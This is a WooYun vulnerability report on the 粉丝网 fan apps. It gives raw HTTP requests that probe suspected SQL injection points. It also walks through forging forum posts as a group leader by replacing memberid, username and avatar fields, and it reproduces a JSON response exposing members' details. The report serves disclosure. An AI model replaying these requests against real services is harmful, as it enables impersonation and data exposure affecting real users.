当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133480

漏洞标题:粉丝网APP两处设计不当

相关厂商:粉丝网

漏洞作者: Ton7BrEak

提交时间:2015-08-12 23:01

修复时间:2015-09-26 23:12

公开时间:2015-09-26 23:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-12: 细节已通知厂商并且等待厂商处理中
2015-08-12: 厂商已经确认,细节仅向厂商公开
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开

简要描述:

粉丝网某APP几处设计不当

详细说明:

目前发现了了两个APP
一个是 粉丝焦点,一个是 粉丝团。两个应用的用户通用。
粉丝焦点和粉丝团 在搜索页面都有报错,存在疑似注入点。后来发现手工注入链接会被重置,所以放弃,还是大神来吧。这里提出来
参数cname

POST /index.php?m=focus&c=api_2_4 HTTP/1.1
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Host: v2.api.imtoutiao.com
Connection: Keep-Alive
Accept-Encoding: gzip
submit=1&a=starsearch&cname=


001.jpg


然后是粉丝团的搜索,参数search

POST /index.php?m=fansorg&c=api_2_6&a=fans_search HTTP/1.1
Content-Length: 513
Content-Type: application/x-www-form-urlencoded
Host: v2.api.imtoutiao.com
Connection: Keep-Alive
Accept-Encoding: gzip
startnum=0&starid=0&_secdata=3ryj8Fr0nfHmpBAMv5MXv-j3K_k8eKYBjv6nLTBmWGIbXIWCXMlAy7M3zFcvLlbdlWu1FTPEFeTn%0AqbcM3rLonWlWLUPRq0-5Z8sxoozKP91F6MmtZoI3sDU-Pme4FX7SVvcqParGwUi93xqeSl9v50E2%0AoAGglVw6UM0HAT2Tdp8jq3K-cxJrgsJ3q7Q0FXhe1z0qF2rT1K4nCr4-jxD6wGOvGW85tW_2KMDQ%0AooJAwxVI-UVBGJF_tMX6YoHh3LFUhQfMq0L0I1X5DccnR3IRg3utlsflMiQdjKTngTg9LdLaQSqD%0ADQ0Qz0qZ8s1TkSJw7hkJGfQ5uDLXDaYlDQarX4y4bA8xNLHOrMHVxAzhK2K3qK2syW3NI01njlap%0AOCJHtVVOCDxcisBZN-uJDeZDRJoFj4qSohlD3mQ6IP8AR_kHGuPN0jifs_fESVXS96tg%0A&search=1&limit=10


002.jpg

漏洞证明:

粉丝团可以伪造他人发布主题、回复等
1、随意拉去一个粉丝团

001.jpg


2、burp抓包,可以得到这些会员的信息。这里需要利用的有headface memberid username,具体返回值如下

HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Tue, 11 Aug 2015 15:00:55 GMT
Content-Type: application/json
Connection: keep-alive
X-Powered-By: PHP/5.4.37
Content-Length: 3420
{"result":1,"start":0,"limit":10,"data":[{"id":"6417","memberid":"7655","username":"\u9a6c\u53ef\u540e\u63f4\u4f1a","headface":"http:\/\/uploadfiles.imtoutiao.com\/avatar\/7655\/20150724080650506.jpg","roleid":"3","groupid":"1249","groupname":"\u9a6c\u53ef\u7c89\u4e1d\u540e\u63f4\u4f1a","thumb":"","addtime":"2015-06-29 15:09:20","status":"1","integral":"3"},{"id":"5899","memberid":"5259","username":"\u51dd\u7738","headface":"http:\/\/uploadfiles.imtoutiao.com\/avatar\/5259\/20150622022135886.jpg","roleid":"1","groupid":"1249","groupname":"\u9a6c\u53ef\u56e2","thumb":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0625\/20150625104913274.jpg","addtime":"2015-06-25 23:06:23","status":"1","integral":"954"},{"id":"9225","memberid":"1481","username":"\u9f50\u5929\u5927\u5723","headface":"http:\/\/uploadfiles.imtoutiao.com\/avatar\/1481\/20150801121129703.jpg","roleid":"1","groupid":"1249","groupname":"\u9a6c\u53ef\u7c89\u4e1d\u540e\u63f4\u4f1a","thumb":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0625\/20150625104913274.jpg","addtime":"2015-07-25 12:30:34","status":"1","integral":"920"},{"id":"6566","memberid":"7501","username":"\u7334\u5b50","headface":"http:\/\/tp4.sinaimg.cn\/5142338359\/180\/5717194094\/0","roleid":"1","groupid":"1249","groupname":"\u9a6c\u53ef\u7c89\u4e1d\u540e\u63f4\u4f1a","thumb":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0625\/20150625104913274.jpg","addtime":"2015-07-02 09:42:45","status":"1","integral":"791"},{"id":"8490","memberid":"8757","username":"\u82cf\u83ca\u82b1korn","headface":"http:\/\/uploadfiles.imtoutiao.com\/avatar\/8757\/20150721044201256.jpg","roleid":"1","groupid":"1249","groupname":"\u9a6c\u53ef\u7c89\u4e1d\u540e\u63f4\u4f1a","thumb":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0625\/20150625104913274.jpg","addtime":"2015-07-23 01:03:41","status":"1","integral":"532"},{"id":"6499","memberid":"1897","username":"\u5947\u8ff9\u306e\u5c11\u5973","headface":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0427\/20150427031149664.jpg","roleid":"1","groupid":"1249","groupname":"\u9a6c\u53ef\u7c89\u4e1d\u540e\u63f4\u4f1a","thumb":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0625\/20150625104913274.jpg","addtime":"2015-07-01 16:31:54","status":"1","integral":"387"},{"id":"6807","memberid":"6927","username":"\u5434\u5e9a\u9716\u5bb6\u7684\u6363\u86cb\u9b3c\u5a9b\u5a9b","headface":"http:\/\/uploadfiles.imtoutiao.com\/avatar\/6927\/20150623114829891.jpg","roleid":"1","groupid":"1249","groupname":"\u9a6c\u53ef\u7c89\u4e1d\u540e\u63f4\u4f1a","thumb":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0625\/20150625104913274.jpg","addtime":"2015-07-05 22:42:13","status":"1","integral":"363"},{"id":"8623","memberid":"6485","username":"\u6211\u7231\u4f60\u7231\u4f60\u7231\u6211-KarRoyY","headface":"http:\/\/uploadfiles.imtoutiao.com\/avatar\/6485\/20150621101343131.jpg","roleid":"1","groupid":"1249","groupname":"\u9a6c\u53ef\u7c89\u4e1d\u540e\u63f4\u4f1a","thumb":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0625\/20150625104913274.jpg","addtime":"2015-07-24 09:33:07","status":"1","integral":"310"},{"id":"9224","memberid":"1101","username":"herui201211","headface":"http:\/\/uploadfiles.imtoutiao.com\/avatar\/1101\/20150604082536686.jpg","roleid":"1","groupid":"1249","groupname":"\u9a6c\u53ef\u7c89\u4e1d\u540e\u63f4\u4f1a","thumb":"http:\/\/uploadfiles.imtoutiao.com\/2015\/0625\/20150625104913274.jpg","addtime":"2015-07-25 12:30:32","status":"1","integral":"255"}]}


3、OK选定目标,团长“马可后援会”,他的相关信息为{"id":"6417","memberid":"7655","username":"\u9a6c\u53ef\u540e\u63f4\u4f1a","headface":"http:\/\/uploadfiles.imtoutiao.com\/avatar\/7655\/20150724080650506.jpg
名称url编码后为%e9%a9%ac%e5%8f%af%e5%90%8e%e6%8f%b4%e4%bc%9a
4、用自己的账号发布一个主题。替换为团长的信息,这里替换了headface memberid username

POST /index.php?m=topic&c=api_2_6&a=add_topic HTTP/1.1
Content-Length: 701
Content-Type: application/x-www-form-urlencoded
Host: v2.api.imtoutiao.com
Connection: Keep-Alive
Accept-Encoding: gzip
position=0&isimg=0&headface=http%3A%2F%2Fuploadfiles.imtoutiao.com%2Favatar%2F7655%2F20150724080650506.jpg&content=123123&isds=0&nick=%e9%a9%ac%e5%8f%af%e5%90%8e%e6%8f%b4%e4%bc%9a&join=0&groupid=1249&_secdata=k0VbUWd1nmi5myF6205QSf8rrn1XUwkXyynVH0hXVx79pvQ-vbC7HvZ8KCwwqoZvqbE7Vkltn1ZD%0AYVLxDV-1ooYtwx3tFvcX2_kqyxSGNqNtmp6iNNfg70WZ9YMohaW-0yIQDBR74nSzLikZg38ax_qK%0AfJjJWUYgmDEDifvn2GQBIRjsJ4ygLDOJ9X8kTpP-W-YMvLcmchwpXMK5XP-Dgnths4f50ELlhSi3%0A7VskZR6oxqR1pbwODv-d6xk4DbI0l-F-Qu9DSHYiS1M6iJpBJO8gO13sBqyhdxak1bVLLIAbHXJI%0Aa5NlLBE5bVfl6D2LV22BG2EQAZ5pRywkGiyAJR5_SPPWCm8KJsaRAAFVfszIsPQUuwywlF7qwUP-%0AcMrHsjLVOvFmnCsL6Gg_1YCz-o4nJUZOjiCteK2X5_bGYL1r-tmIg7kuo5AbwFmfnDMB%0A&title=123123&createtime=0


5、看结果

001.jpg


002.jpg


003.jpg


6、基于同样的原理,回复也可以直接伪造回复等,这里就不详说

修复方案:

版权声明:转载请注明来源 Ton7BrEak@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-12 23:10

厂商回复:

感谢提出

最新状态:

暂无